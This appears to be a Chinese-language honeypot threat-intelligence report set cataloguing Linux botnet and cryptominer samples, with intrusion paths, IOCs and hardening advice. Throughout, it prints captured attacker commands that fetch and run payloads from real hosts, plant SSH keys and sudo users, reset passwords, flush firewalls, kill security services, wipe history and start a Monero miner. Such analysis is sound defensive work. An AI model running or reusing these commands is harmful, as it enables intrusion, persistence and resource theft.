    • nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
    • sleep 8m && nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&

IOC

  • 186.147.249.39

参考链接

  • dota3.tar.gz

https://www.countercraftsec.com/blog/dota3-malware-again-and-again/

  • dota.tar.gz

https://blog.edie.io/2020/10/31/honeypot-diaries-dota-malware/

简述

该样本回连IP与Mirai 变体样本具有强关联,推测为Mirai变体之一

样本类型

僵尸网络

elkeid 样本ID

elkeid_20221115_botnet_5

关键词

x86.sh

捕获时间

20221114

最近活跃时间

20221114

已知入侵途径

  • 弱口令爆破

涉及样本

  • /tmp/x86.sh

主要行为

  • 下载

    • bash -c yum install wget -y; apt install wget -y;dnf install wget; pacman -S wget;
    • cd /tmp; wget http://109.206.241.34/x86.sh; curl -O http://109.206.241.34/x86.sh;
  • 赋权

    • chmod 777 x86.sh
  • 执行

    • sh x86.sh china
  • 写入定时任务

    • sed -i /newinit.sh/d /etc/crontab
    • sed -i /null 2>&1/d /etc/crontab
  • 关闭服务

    • systemctl kill -s HUP rsyslog.service
  • 更新密码

    • /bin/bash -c echo steam:Test1 | chpasswd

IOC

  • 152.32.128.128
  • 109.206.241.34

参考链接

  • 152.32.128.128 virustotal情报

https://www.virustotal.com/gui/ip-address/152.32.128.128

  • 109.206.241.34 virustotal情报

https://www.virustotal.com/gui/url/ca403e52ee2cb1663ef1ada83859d984f52e221d5064b0092ca8f88501c97e34

简述

arhivehaceru_Update为botnet样本,下载自arhivehaceru.com域名,感染主机后构建僵尸网络,可发动DDos攻击。

elkeid 样本ID

  • elkeid_20221202_botnet_8

捕获时间

  • 20221202

最近活跃时间

  • 20221202

关键词

./History,arhivehaceru

已知入侵途径

  • 弱口令爆破

涉及样本

执行目录

  • /var/tmp
  • /dev/shm

样本

  • History

    • shell文件,启动脚本
  • Update

    • bot程序

主要行为

  • ssh行为

    • 收集信息

      • bash -c uname -s -v -n -r -m
      • bash -c curl ipinfo.io/org
      • bash -c nproc
    • 下载并赋权执行 "History" -bash -c cd /var/tmp || cd /dev/shm ; mkdir .update-logs ; cd .update-logs ; wget -q arhivehaceru.com/.x/Update || curl -O -s -L arhivehaceru.com/.x/Update ; wget -q arhivehaceru.com/.x/History || curl -O -s -L arhivehaceru.com/.x/History ; chmod +x * ; ./History ;

    • 清除历史记录

      • history -c
  • History行为

    • 执行Update

      • pidof Update
      • ./Update
  • Update

    • bot程序,暂无捕获行为

IOC

URLsha256
arhivehaceru.com/.x/HistoryHistory:e9bbe9aecfaea4c738d95d0329a5da9bd33c04a97779172c7df517e1a808489c
arhivehaceru.com/.x/UpdateUpdate:0037cc30be8824b8d5c1576d6a93342de063778ee210d3127de6c3b1173de451

已知情报

安全配置建议

  • 避免使用弱密码或默认密码

参考链接

简述

yy.py样本执行了ssh登陆后通过vim编辑的yy.py文件。同时行为集合中存在/root/pty样本的关联行为,该样本与僵尸网络和挖矿有关,在本报告的数据采集周期内未见其他派生行为。

elkeid 样本ID

  • elkeid_20221202_botnet(miner)_9

捕获时间

  • 20221121

关键词

yy.py,x001804289383

最近活跃时间

  • 20221121

已知入侵途径

  • 弱口令爆破

涉及样本

执行目录

  • /root

样本

  • yy.py

    • python文件
  • pty

    • elf文件

主要行为

  • ssh行为

    • 安装文件

      • sudo apt install screen
      • bash -c curl ipinfo.io/org
      • bash -c nproc
    • 编辑yy.py 并赋权执行

      • vim yy.py
      • touch yy.py
      • screen -S yy
      • python3 yy.py
  • /root/pty行为

    • 查看定时任务并过滤掉包含"/root/pty","no cron" 和 "lesshts/run.sh"的行,并将结果输出到/var/run/.x001804289383 )

      • sh -c (crontab -l | grep -v "/root/pty" | grep -v "no cron" | grep -v "lesshts/run.sh" > /var/run/.x001804289383) > /dev/null 2>&1
      • crontab /var/run/.x001804289383
      • rm -rf /var/run/.x001804289383

IOC

URLsha256
http://147.231.19.62/.x/ptyaf736d0466d0c88fe66666676ca09462fddedbbe8befe49dd2dc691053c293c6

已知情报

https://vms.drweb.com/virus/?i=24091822

https://www.kernelmode.info/forum/viewtopicf566-2.html?t=2747&start=20

https://www.virustotal.com/gui/file/af736d0466d0c88fe66666676ca09462fddedbbe8befe49dd2dc691053c293c6/detection/f-af736d0

安全配置建议

  • 避免使用弱密码或默认密码

参考链接

报告信息

简述

该样本为tsunami 族内样本,属于僵尸网络类型的样本

样本类型

僵尸网络

elkeid 样本ID

elkeid_20221208_botnet_6

关键词

tsunami,irq,tty,tsh,3sh,x001804289383

捕获时间

20221208

最近活跃时间

20221208

已知入侵途径

  • 弱口令爆破

涉及样本

  • /tmp/irq0(irq1,irq2)
  • /tmp/pty
  • /tmp/tty0(tty1...tty6)
  • /tmp/1sh(2sh,3sh,tsg)

主要行为

  • 下载

    • bash -c wget -qO - http://113.106.167.11/x/2sh | sh > /dev/null 2>&1 &
    • curl http://113.106.167.11/x/tty2 -o /tmp/tty2
    • curl http://113.106.167.11/x/pty -o pty
  • 赋权

    • chmod 777 /tmp/irq1
    • chmod +x /tmp/tty6
    • ...
  • 执行

    • sh /var/run/1sh &
    • tftp -g 127.0.0.1 -r tsh ; sh tsh
    • /bin/sh ./irq1
    • crontab /var/run/.x001804289383
  • 扫描

    • ip -4 addr change 172.9.58.46/255.255.0.0 broadcast 172.9.255.255 valid_lft 1800 preferred_lft 1800 dev ens3 label ens3

IOC

  • 113.106.167.11
  • 83.252.207.213

参考链接

  • tsunami.elf

https://threatfox.abuse.ch/browse/malware/elf.tsunami/

  • 113.106.167.11

https://www.virustotal.com/gui/url/9feeefbeb83e31d62a1da584db2a42d6a74ad4627bcfdca7fc1e54d3eb405021

简述

该样本ssh登陆后针对hive os挖矿平台进行操作,设置用户密码并关闭开放服务减少暴露。猜测可能为批量扫描暴露的矿机进行利用。

样本类型

挖矿

elkeid 样本ID

elkeid_20220609_miner_3

捕获时间

  • 20220609

最近活跃时间

  • 20221207

已知入侵途径

  • 弱密码

涉及样本

  • 无样本

主要行为

  • 设置hive os 密码

    • bash -c sudo hive-passwd set 2i4gi2j4gigj3jggig45hgh;
    • sudo hive-passwd i2gji23g4jigh3gji4hggij345hgh;
  • 关闭Xorg图形界面

    • sudo pkill Xorg
  • 关闭vnc服务

    • sudo pkill x11vnc
  • 禁用shellinabox

    • systemctl disable shellinabox

IOC

  • 141.98.11.112
  • 122.14.229.13
  • 172.9.208.169## 简述

该样本ssh登陆后针对hive os挖矿平台进行操作,设置用户密码并关闭开放服务减少暴露。猜测可能为批量扫描暴露的矿机进行利用。

样本类型

挖矿

elkeid 样本ID

elkeid_20220609_miner_3

捕获时间

  • 20220609

最近活跃时间

  • 20221207

已知入侵途径

  • 弱密码

涉及样本

  • 无样本

主要行为

  • 设置hive os 密码

bash -c sudo hive-passwd set 2i4gi2j4gigj3jggig45hgh;

sudo hive-passwd i2gji23g4jigh3gji4hggij345hgh;

  • 关闭Xorg图形界面

sudo pkill Xorg

  • 关闭vnc服务

sudo pkill x11vnc

  • 禁用shellinabox

systemctl disable shellinabox

IOC

  • 141.98.11.112
  • 122.14.229.13
  • 172.9.208.169

简述

robertreynolds2是github上的一个挖矿样本.

样本类型

挖矿

elkeid 样本ID

elkeid_20220725_miner_2

捕获时间

  • 20220725

最近活跃时间

  • 20221118

已知入侵途径

  • 弱口令爆破

涉及样本

  • https://raw.githubusercontent.com/robertreynolds2/solo/main/solo

主要行为

  • 爆破后从git源拉取挖矿程序

wget https://raw.githubusercontent.com/robertreynolds2/solo/main/solo && chmod +x solo

  • 连接矿池进行挖矿

./solo -o gulf.moneroocean.stream:80 -u 49Wr4g6SVqiRabVyhk5zigZXR6bNXX8H5bhMUYiSTk1ijdhB2MBDQTedNuCj27NpFG53oWpaRq8hU1qHHHFevbCsQbCTXdN -p sshs -k -a rx/0 -t 16 -B

IOC

  • sha256

3928c5874249cc71b2d88e5c0c00989ac394238747bb7638897fc210531b4aab

  • 回连IP

  • URL

    • 挖矿程序: https://raw.githubusercontent.com/robertreynolds2/solo/main/solo
    • 矿池: gulf.moneroocean.stream

参考链接

  • solo样本情报 https://www.virustotal.com/gui/url/53529ffddf4a13edf3c04bfb42bcc61e73a7805c04068fc973f3bf484c64a44b/details

* 矿池情报 https://www.virustotal.com/gui/url/f79b7f06c6c3a5e4a66602f32b7e4519dc8df566f8bf85f469db5b5cf65d9c08

简述

Cleanfda是一种挖矿木马,通常会通过未授权命令执行漏洞攻击目标主机,并利用SSH爆破等方式呈蠕虫式传播。

Cleanfda驻留的免密登录后门将给服务器带来不可预料的各类型网络风险,蠕虫功能,门罗币矿机模块不间断的工作,会导致系统CPU负载过大,大量消耗主机CPU资源,严重影响主机正常服务运行,导致主机有系统崩溃风险。

elkeid 样本ID

elkeid_20220809_miner_1

类型

挖矿;后门

捕获时间

  • 2022-08-09

最近活跃时间

  • 2022-11-23

已知入侵途径

  • 弱口令爆破

  • redis 弱密码

  • 涉及样本

    • init.sh
    • newinit.sh
    • is.sh
    • zzh
    • pnscan.tar.gz
    • call.txt

主要行为

  • 下载

curl -fsSL http://195.242.111.238/cleanfda/init.sh

  • 赋权:为相关文件加入隐藏属性、赋予最高权限、增加文件不可修改权限

chmod 777 /usr/bin/chattr chattr -iae /root/.ssh/

  • 执行:利用漏洞植入恶意命令,随后下载植入pnscan,masscan,sshbru进行扫描爆破蠕虫扩散,同时执行挖矿模块

  • 侦查:扫描端口,确认可攻击目标存在的SSH,Redis,docker等服务

  • 清理挖矿竞品

xargs -I % kill -9 %

  • 修改命令目录

mv /usr/bin/curl /usr/bin/url

  • 查找其他安全服务并关闭

systemctl disable aliyun.service

  • 清空防火墙规则

iptables -F

特点

  • 利用Docker Remote Api未授权命令执行漏洞攻击云主机
  • 利用SSH爆破、Redis未授权写计划任务等方式呈蠕虫式传播
  • 尝试卸载云主机安全软件,尝试结束、清除竞品挖矿木马
  • 劫持ps,top,pstree等系统工具隐蔽挖矿
  • 改写authorized_keys设置免密登录后门
  • 读取主机历史ssh登录信息尝试登入并植入恶意脚本执行

IOC

  • MD5

    • 7fe93cabeb10c6c8ed414ef8ca479588
    • f0551696774f66ad3485445d9e3f7214
    • 859fbbedefc95a90d243a0a9b92d1ae9
    • d138c74fb95be4cb69559f4fb2f5850c
    • 4f6a3d06bfc5da004deb5959131e05c1
  • 回连IP

    • 47.114.157.117
    • 45.133.203.192
    • 194.87.139.103
    • 195.242.111.238
    • 45.83.123.29
  • 攻击IP

    • 185.36.81.44
    • 221.215.21.91
    • 223.113.52.38
    • 221.215.21.91
    • 111.9.22.217
    • 179.60.147.159
    • 120.196.57.169
    • 189.237.204.179
    • 152.136.206.141
    • 140.206.186.171
    • 192.241.207.204
    • 153.35.239.238
    • 140.206.186.171
  • sha256

    • 4289ba60e1852a9d5ef1b4fb04be8e918148f7b3fe04fe371371f09a36efee00
    • be0fe6a1344b052d4f61cca910f7d26ad02d283f280014eeca0d1cc729e6822a
  • URL

    • http://47.114.157.117/cleanfda/zzh
    • http://47.114.157.117/cleanfda/is.sh
    • http://47.114.157.117/cleanfda/init.sh
    • http://47.114.157.117/cleanfda/trace
    • http://45.133.203.192/cleanfda/zzh
    • http://45.133.203.192/cleanfda/newinit.sh
    • http://45.133.203.192/cleanfda/pnscan.tar.gz
    • http://45.133.203.192/b2f628fff19fda999999999/1.0.4.tar.gz
    • http://45.133.203.192/cleanfda/init.sh
    • http://45.133.203.192/cleanfda/config.json
    • http://45.133.203.192/cleanfda/is.sh
    • http://45.133.203.192/cleanfda/rs.sh
    • http://45.133.203.192/cleanfda/call.txt
    • http://194.87.139.103/cleanfda/ps
    • http://194.87.139.103/cleanfda/hxx
    • http://py2web.store/cleanfda/zzh
    • http://py2web.store/cleanfda/newinit.sh
    • http://195.242.111.238/cleanfda/init.sh
    • http://45.83.123.29/cleanfda/init.sh
    • http://195.242.111.238/cleanfda/is.sh
    • http://en2an.top/cleanfda/init.sh
    • http://45.83.123.29/cleanfda/newinit.sh

安全配置建议

  • 建议安全运维人员配置Docker swarm服务端口不要暴露在公网,修改Docker swarm的认证方式,可以使用TLS认证。

  • 建议Redis 服务端口不要暴露在公网,使用强口令。

  • 配置SSH服务使用强口令。

沙箱行为

cleandfda/zzh

https://www.virustotal.com/gui/file/4289ba60e1852a9d5ef1b4fb04be8e918148f7b3fe04fe371371f09a36efee00/behavior

ATT&CK行为

  • 持久化&权限提升

    • 使用systemctl控制关联的服务
  • 系统信息收集

读取CPU信息&读取proc文件系统信息,uname获取内核信息 bash -c cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;}

进程链路

4145 - /tmp/sample

4162 - /usr/lib/snapd/snap-failure snapd

4163 - /usr/lib/snapd/snapd

4184 - /usr/sbin/apparmor_parser --preprocess

4185 - /usr/bin/systemctl systemctl stop snapd.socket

4187 - /snap/snapd/15177/usr/lib/snapd/snapd

4193 - /usr/sbin/apparmor_parser --preprocess

4194 - /usr/sbin/apparmor_parser n/a

4197 - /usr/bin/grep grep -q ^lxd-core

4198 - /usr/bin/getent getent passwd lxd

4199 - /usr/sbin/apparmor_parser n/a

4200 - /usr/sbin/apparmor_parser --preprocess

4201 - /usr/bin/getent getent group lxd

4204 - /usr/bin/getent getent group lxd

4205 - /usr/sbin/apparmor_parser n/a

4206 - /usr/sbin/apparmor_parser --preprocess

排查建议

  1. 请先确认该文件是否为测试文件

  2. 如果非业务行为请通过root登陆,并清理【rm】下载的文件

  3. 排查 .bashrc .bash_profile .profile 系统启动项 crontab 等是否有被驻留,并做清理

参考链接

http://195.242.111.238/cleanfda/init.sh

  • https://www.virustotal.com/gui/url/9239e70c57835d61b7ed0fde7aea75bc5d01d2fab5b5fff70985474031ffa41c

http://47.114.157.117/cleanfda/is.sh

  • https://www.virustotal.com/gui/url/3c669af321d413acce4002b7fcd1ed969842d850110f9dae13d60261b848115b

http://45.133.203.192/cleanfda/newinit.sh

  • https://www.virustotal.com/gui/url/7c84f5daedb3cec07ff40f62b9c47c49072bc6572bb2a687a28d06f8c231310b

  • https://threatintelligence.guardicore.com/ip/45.133.203.192

http://194.87.139.103/cleanfda/ps

  • https://www.virustotal.com/gui/url/76839633ee49de40f16dee389303c1e2a889d20edd09625f238a48d44575e79b

http://py2web.store/cleanfda/zzh

  • https://www.virustotal.com/gui/url/2feaa91d90e5b80e21ccc92b3d8a9c89c6cf03174817c2576aff375183a980e1

http://45.83.123.29/cleanfda/init.sh

  • https://www.virustotal.com/gui/url/ad09b650fa64d95ed9cf771a1ac393445dcde44b3f24c6102ad67e2986d4ecbd

http://en2an.top/cleanfda/init.sh

  • https://www.virustotal.com/gui/url/754851bfca481ee458da816606a35ffc3af0f9dc3eff1eee3479270092314ade

简述

hoze样本为挖矿样本,感染x86_64主机,通过多个样本/脚本链式启动,并且会及时清理自身痕迹,还会进行添加用户、密码、公钥等持久化行为。

elkeid 样本ID

  • elkeid_20221106_miner_6

捕获时间

  • 20221106

最近活跃时间

  • 20221118

关键词

hoze,secure

已知入侵途径

  • 弱口令爆破

涉及样本

执行目录

  • /etc
  • /var/tmp
  • /tmp
  • .xrx

样本

  • hoze

    • 经过代码混淆的恶意shell脚本,同时也作为启动脚本
  • newinit.sh

    • 不详
  • zzh

    • 不详
  • xrx

    • elf文件, 挖矿木马
  • init.sh

    • 实际为elf文件,代理木马
  • init0

    • elf文件,代理木马
  • uninstall.sh

    • shell文件
  • config.json

    • 配置文件
  • key

    • RSA公钥
  • scp

    • shell文件, 可启动/dev/shm/.x/secure
  • secure

    • elf文件,代理木马
  • passwd

    • elf文件, 木马

主要行为

  • ssh行为

    • 收集信息

      • curl ipinfo.io/org
      • bash -c nvidia-smi -q | grep Product Name | head -n 1 | awk {print $4, $5, $6, $7, $8, $9}
    • 下载并赋权执行hoze

      • bash -c cd /var/tmp ; curl -O 185.252.178.82:6972/hoze || cd1 -O 185.252.178.82:6972/hoze || wget 185.252.178.82:6972/hoze ; chmod +x hoze ; ./hoze
  • hoze行为

    • 采集信息

      • nproc;
      • cat /proc/meminfo | grep MemAvailable | awk '{print$2}';
    • 清理自身

      • rm -rf hoze
      • rm -rf /var/tmp/hoze
    • 清理竞品

      • rm -rf ~/xmrig*
      • rm -rf ~/c3pool*
      • pkill -STOP xmrig
      • pkill -STOP Opera
      • pkill -STOP kthreaddk
      • pkill -STOP kdevtmpfsi
      • rm -rf /usr/local/bin/pnscan > /dev/null 2>&1
      • pkill -f "pnscan" > /dev/null 2>&1
      • chattr -ia /etc/zzh > /dev/null 2>&1
      • chattr -ia /tmp/zzh > /dev/null 2>&1
      • rm -rf /etc/zzh > /dev/null 2>&1
      • rm -rf /tmp/zzh > /dev/null 2>&1
      • pkill -f "zzh" > /dev/null 2>&1
      • chattr -ia /tmp/.ice-unix > /dev/null 2>&1
      • rm -rf /tmp/.ice-unix > /dev/null 2>&1
      • chattr -ia /usr/local/bin/pnscan > /dev/null 2>&1
    • 下载执行"init0"

      • cd /var/tmp ; curl -O 185.252.178.82:6972/xrx.tar || cd1 -O 185.252.178.82:6972/xrx.tar || wget 185.252.178.82:6972/xrx.tar && tar -xvf xrx.tar && mv xrx .xrx && rm -rf xrx.tar && cd .xrx ; chmod +x * ; ./init0 ;
    • 清理痕迹(删除文件、清理进程、清理定时任务、清除缓存)

      • rm -rf /var/tmp/.xri
      • rm -rf /var/tmp/.xrx
      • rm -rf /var/tmp/.x
      • rm -rf ~/.configrc4
      • rm -rf /tmp/.locald
      • pkill -9 .system3d
      • rm -rf /var/tmp/.a
      • rm -rf /var/tmp/.ladyg0g0
      • rm -rf /usr/lib/updated/*
      • pkill -9 xri
      • pkill -9 xrx
      • pkill -STOP xxi
      • pkill -9 arx645
      • pkill -9 zzh
      • pkill -9 SRBMiner
      • pkill -9 DaggerRandomx
      • pkill -9 dhcpd
      • pkill -9 perl
      • rm -rf ~/Opera
      • chmod 755 /usr/bin/chattr > /dev/null 2>&1
      • chattr -ia /etc/newinit.sh > /dev/null 2>&1
      • rm -rf /etc/newinit.sh > /dev/null 2>&1
      • chattr -R -ia /var/spool/cron > /dev/null 2>&1
      • chattr -ia /etc/crontab > /dev/null 2>&1
      • rm -rf /etc/crontab > /dev/null 2>&1
      • touch /etc/crontab > /dev/null 2>&1
      • chattr -R -ia /var/spool/cron/crontabs > /dev/null 2>&1
      • chattr -R -ia /etc/cron.d > /dev/null 2>&1
      • rm -rf /etc/ld.so.preload > /dev/null 2>&1
      • rm -rf /etc/libsystem.so > /dev/null 2>&1
      • sync; echo 1 > /proc/sys/vm/drop_caches ; sync; echo 2 > /proc/sys/vm/drop_caches ; sync; echo 3 > /proc/sys/vm/drop_caches
      • crontab -l
      • crontab -r > /dev/null 2>&1
      • mv -f /bin/top.original /bin/top > /dev/null 2>&1
  • init0行为

    • 下载执行"secure"、"init.sh"

      • curl -sO http://185.252.178.82:6972/passwd
      • cp /bin/passwd /usr/bin/passwd
      • chmod u+s /bin/passwd
      • chmod 4755 /bin/passwd
      • chattr -ia /etc/passwd
      • chattr -iae /usr/bin/passwd
      • mv /usr/bin/passwd /usr/bin/passwd.orig
      • mkdir /var/tmp/.x
      • mv /var/tmp/.xrx/secure /var/tmp/.x/secure
      • chmod +x /var/tmp/.x/secure
      • /var/tmp/.x/secure -c
      • /var/tmp/.x/secure -c exec '/var/tmp/.x/secure' "$@" /var/tmp/.x/secure
      • ./init.sh -c exec './init.sh' "$@" ./init.sh hide
    • 批量修改用户密码

      • usermod -p $6$u3a2aCKC$TULEOlBwPWBIAYZkG0NNNbWM.9tRozeHUO2HyRvlTQpekaOQ2E3S5E5/gqyOnVAtaF8G41oZS0KRioLw7PfzT1 ubuntu
      • usermod -p $6$u3a2aCKC$TULEOlBwPWBIAYZkG0NNNbWM.9tRozeHUO2HyRvlTQpekaOQ2E3S5E5/gqyOnVAtaF8G41oZS0KRioLw7PfzT1 mcserver
      • usermod -p $6$u3a2aCKC$TULEOlBwPWBIAYZkG0NNNbWM.9tRozeHUO2HyRvlTQpekaOQ2E3S5E5/gqyOnVAtaF8G41oZS0KRioLw7PfzT1 kwinfo
      • usermod -p $6$u3a2aCKC$TULEOlBwPWBIAYZkG0NNNbWM.9tRozeHUO2HyRvlTQpekaOQ2E3S5E5/gqyOnVAtaF8G41oZS0KRioLw7PfzT1 testuser
      • ......
    • 添加权限

      • useradd cheeki
      • usermod -aG sudo cheeki
      • mv key /root/.ssh/authorized_keys
    • 清理痕迹

      • rm -rf /var/tmp/.xrx/init0
      • rm -rf /root/.bash_history
      • pkill -9 xri
      • pkill -STOP xmu
      • pkill -STOP xxi
      • /var/tmp/.xrx/uninstall.sh
  • secure行为

    • 执行xrx

      • grep -q secure
      • /var/tmp/.xrx/xrx
      • cat /etc/crontab
      • sleep 1
      • pgrep xrx
  • init.sh行为

    • 执行xrx

      • pidof xrx
      • ./xrx
      • mount -o bind /var/tmp/... /proc/568

IOC

URLsha256
185.252.178.82:6972/hozehoze:d5c429ab6e638bec352eaf8616354917ad87d6e1e9122efa27c75af83f9d91fe
http://185.252.178.82:6972/passwdpasswd:cb7d520296116df898c01bb9e94c05efcaa38dffb14354f42b62262c5b147e34
185.252.178.82:6972/xrx.tarxrx:fb86120a4a1b13b29957eb5f95f7857cf9e469514fc20d25fad02ae87bf99091
185.252.178.82:6972/xrx.tarscp:fc26873006164decacbcfb01d246b54539b786b404be0bb1a5cde5263031663a
185.252.178.82:6972/xrx.tarsecure:32d1d84f483e667a55f77f70064086bacfe58994cb6e951410265df831535a79
185.252.178.82:6972/xrx.tarinit.sh:a5d094b18c2ed9c0e341f49554bae4987445c92cb09bcc88c21a45c56c5c1d99
185.252.178.82:6972/xrx.tarinit0:0847491b96e6446dd3c3d340f7e837858663c559080e5f36b3510b3f60f0be82

已知情报

安全配置建议

  • 避免使用弱密码或默认密码

参考链接

https://misakikata.github.io/2022/02/XMR%E9%97%A8%E7%BD%97%E5%B8%81%E6%8C%96%E7%9F%BF%E5%BA%94%E6%80%A5/

报告信息

简述

该样本通过ssh登录后,存在一系列修改定时任务,清除挖矿竞品,重命名系统命令的行为,具有较强的挖矿样本的特征.

样本类型

挖矿

关键词

.mm.jpg,download.sh,x001804289383

elkeid 样本ID

elkeid_20221120_miner_4

捕获时间

20221120

最近活跃时间

20221120

已知入侵途径

  • 弱口令爆破

涉及样本

  • .mm.jpg
  • .chartroot.jpg
  • /tmp/download.sh

主要行为

  • 下载

    • curl -O https://testv.dns-alibaba.com/.mm.jpg
    • curl -O http://47.108.119.184:55555/.chartroot.jpg
    • apt-get -y install dnsutils
    • wget -t 1 http://107.189.7.193:9999/linux_amd64
    • wget http://107.189.7.193:9999/download.sh
  • 赋权

    • chmod 777 .mm.jpg
    • chmod +x linux_amd64
    • chmod 777 download.sh
  • 重命名系统命令

    • cp -f /usr/bin/chattr /usr/bin/lockr
    • /bin/bash -c cp -f -r -- /bin/.funzip /bin/.sh 2>/dev/null && /bin/.sh -c >/dev/null 2>&1 && rm -rf -- /bin/.sh 2>/dev/null
  • 执行

    • /bin/sh -c /root/pty > /dev/null 2>&1 &
    • crontab /var/run/.x001804289383
    • sh -c (crontab -l | grep -v "/root/pty" | grep -v "no cron" | grep -v "lesshts/run.sh" > /var/run/.x001804289383) > /dev/null 2>&1
    • ./download.sh
    • ./linux_amd64
    • /.img
  • 写入定时任务

    • sed -i /newinit.sh/d /etc/crontab
    • sed -i /null 2>&1/d /etc/crontab
    • bash -c echo "*/1 * * * * root /.img " >> /etc/crontab
  • 关闭防火墙

    • sudo service firewalld stop
    • systemctl stop firewalld.service
  • 锁定文件

    • lockr(原为chattr) +ai /etc/newinit.sh
  • 清理竞品

    • rm -rf /etc/systemd/system/c3pool_miner.service (4SHMiner)
    • lockr -ia /root/.xmrig.json
    • rm -rf /usr/lib/systemd/system/cryptsetup.service
  • 阻止竞品

    • iptables -A OUTPUT -m string --string auto.c3pool.org --algo bm --to 65535 -j DROP
    • iptables -I INPUT -s 45.9.148.117 -j DROP
    • iptables -I INPUT -s 45.9.148.125 -j DROP
    • iptables -I INPUT -s 35.205.61.67 -j DROP
    • iptables -I INPUT -s 178.128.108.158 -j DROP
    • iptables -I INPUT -s 45.9.148.99 -j DROP
    • iptables -A OUTPUT -m string --string download.c3pool.com --algo bm --to 65535 -j DROP
  • 收集系统信息

    • cat /etc/passwd
    • cat /etc/system-release
    • cat /proc/cpuinfo

IOC

  • 154.202.59.212
  • 47.108.119.184
  • 107.189.7.193

参考链接

  • https://vms.drweb.cn/virus/?i=24091822 ——具有相似行为
  • 107.189.7.193

https://www.virustotal.com/gui/url/bc951dfd70063b44411beb948c4132d3091dbe43c629982de40a5b29f30201b1

简述

该样本通过ssh暴破登录后,存在一系列修改定时任务,清除挖矿竞品,重命名系统命令的行为,具有较强的挖矿样本的特征.

样本类型

挖矿

关键词

.sh,httpss,zh

elkeid 样本ID

elkeid_20221120_miner_7

捕获时间

20221120

最近活跃时间

20221120

已知入侵途径

  • 弱口令爆破

涉及样本

  • .sh
  • /usr/lib/mysql/mysql (重命名)
  • /sbin/httpss (重命名)

主要行为

  • 重命名系统命令

    • cp -f -- https .sh
    • cp -f -- sh .sh
  • 执行

    • ./.sh
    • ./.sh -c
    • /bin/sh -c /sbin/httpss >/dev/null 2>&1;
    • /bin/sh -c /usr/bin/zh >/dev/null 2>&1;
    • /bin/sh -c /usr/lib/mysql/mysql;
  • 清理挖矿竞品

    • pkill -9 Donald
    • pkill -f ./-bash
    • pkill -f .meinkampf
    • pkill -f .report_system
    • pkill -f .syst3md
    • pkill -f /usr/bin/biden1
    • pkill -f apachelogs
    • pkill -f auth.sh
    • pkill -f cpuminer-sse2
    • pkill -f minerd
    • pkill -f secure.sh
    • pkill -f sprshduerjsaia
  • 收集系统信息

    • bash -c echo -e \x6F\x6B
    • cat /proc/cpuinfo

IOC

  • 188.166.164.250

参考链接

  • 188.166.164.250

https://www.virustotal.com/gui/url/c2344de55616d9fc3ac26dbc054700fa2dee605bd9bcc376a423a620e118670b

报告信息

简述

该样本通过ssh登录后,存在一系列修改定时任务、清除挖矿竞品、读取系统信息的行为,根据不同系统架构执行脚本,具有较强的挖矿样本的特征.

样本类型

挖矿

elkeid 样本ID

elkeid_20221207_miner_5

捕获时间

20221207

最近活跃时间

20221207

关键词

b4ngl4d3shS3N941,.billgates,spreader

已知入侵途径

  • 弱口令爆破

涉及样本

  • /tmp/b4ngl4d3shS3N941.x86
  • /tmp/b4ngl4d3shS3N941.aarch64
  • /tmp/b4ngl4d3shS3N941.arm(.arm7 .i586 .i686 ... 等同名不同后缀的版本)

主要行为

  • 下载

    • curl -s -L -O 107.182.129.219/.billgates/b4ngl4d3shS3N941.x86 (.arm 等同名样本)
    • wget -q arhivehaceru.com/payload
    • curl -O -s -L arhivehaceru.com/.x/Update
  • 赋权

    • chmod 777 b4ngl4d3shS3N941.aarch64
  • 重命名

    • mv b4ngl4d3shS3N941.aarch64 .aarch64
  • 执行

    • ./.arm6 spreader (.arm6为重命名后的样本)
  • 清理竞品

    • rm -rf /root/c3pool*
    • pkill -9 xri
    • pkill -9 xrx
    • pkill -STOP xmrig
    • pkill -STOP Opera
    • pkill -STOP kdevtmpfsi
    • pkill -STOP kthreaddk
    • pkill -STOP intelshell
    • pkill -9 SRBMiner
    • pkill -9 intelshell
    • pkill -STOP lowkeymaker
    • rm -rf hoze
  • 清除历史记录

    • history -c ; rm -rf .bash_history ~/.bash_history
    • ./payload ; rm -rf payload ; 执行后清除

IOC

  • ip

    • 107.182.129.219
    • arhivehaceru.com
  • SHA256

    • fb6861f2cfec379eefdb36fe92b1b46308ffe28bddb964bc45c6c0f48c7bb611
    • b843bf8c71451349cf5fcb82cfa450518f38f4cbdff963b88bd5885b618df66d
    • bda6d96421b32c1654c96eb95f218b40227d42bfe7076c191b8c2b6294d5b5ff
    • e9399af4a8f995b94f858f42e1ea8b5cd8c78a0cf1788c784f002640da6bc3ea
    • 5498995c9e68c6bfbba4041e0a12468b21d7158f684404250c3e7e400621dc8b

参考链接

  • 107.182.129.219

https://www.virustotal.com/gui/url/9f1c31fc4ee875ff1124f2e28311f3b5817fdbb71ea9f05340eb4a73c0b3c4d9

  • arhivehaceru.com

https://www.virustotal.com/gui/url/cab48dc408f5496e00dd9a0058d7d6bc128d69b06738204ba47c0a216e68b135

简述

样本关联IP频繁通过暴力破解或窃取的凭据执行 SSH 攻击,通过蜜罐采集行为可知,攻击者在ssh登陆成功后会进行信息收集、修改ssh公钥与系统用户密码。并且在蜜罐中执行行为的时间间隔分布均匀,应为攻击脚本。

样本类型

后门,控制

elkeid 样本ID

elkeid_20220609_backdoor_2

捕获时间

  • 20220609

最近活跃时间

  • 20221115

已知入侵途径

  • ssh爆破
  • ssh凭证窃取

涉及样本

  • 无样本

主要行为

  • 修改用户密码
  • bash -c echo -e q*(&%^#$SHH?M?A-k3f49!^*ZaTk?leSH@q!@#D0\nS97pp7fcZ1qu\nS97pp7fcZ1qu|passwd|bash

Elkeid 沙箱行为分析

  • 信息收集

cat /proc/cpuinfo | grep name | wc -l

free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}

crontab -l

w

uname -m

top

lscpu | grep Model

  • 删除.ssh文件夹,重新写入公钥

